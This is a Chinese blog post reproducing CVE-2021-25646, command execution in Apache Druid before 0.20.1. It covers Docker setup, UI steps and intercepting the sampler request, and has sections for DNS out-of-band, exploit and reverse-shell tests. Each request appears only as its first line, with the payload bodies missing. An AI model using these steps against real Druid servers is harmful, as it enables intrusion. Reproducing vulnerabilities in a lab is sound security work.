CVE-2021-25646-Apache-Druid命令执行漏洞复现
影响版本
- Apache Druid < 0.20.1
环境搭建
1 | docker pull fokkodriesprong/docker-druid |
复现过程
点击Load data->Local disk
右侧填写如下内容
1 | Base directory:quickstart/tutorial/ |
一直点next,直到下一步为filter时,开启抓包,原始数据包如下
DNS外带测试
1 | POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 |
替换为exp
1 | POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 |
反弹shell测试
1 | POST /druid/indexer/v1/sampler?for=filter HTTP/1.1 |
参考文章
- https://www.cnblogs.com/cHr1s/p/14365418.html
- https://mp.weixin.qq.com/s/M2aTk1POinfDs0kuVBhrbA
- https://blog.csdn.net/weixin_44146996/article/details/113705814
本文作者:
yd0ng
本文链接: https://yd0ng.github.io/2021/02/03/CVE-2021-25646-Apache-Druid%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!
本文链接: https://yd0ng.github.io/2021/02/03/CVE-2021-25646-Apache-Druid%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
版权声明: 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处!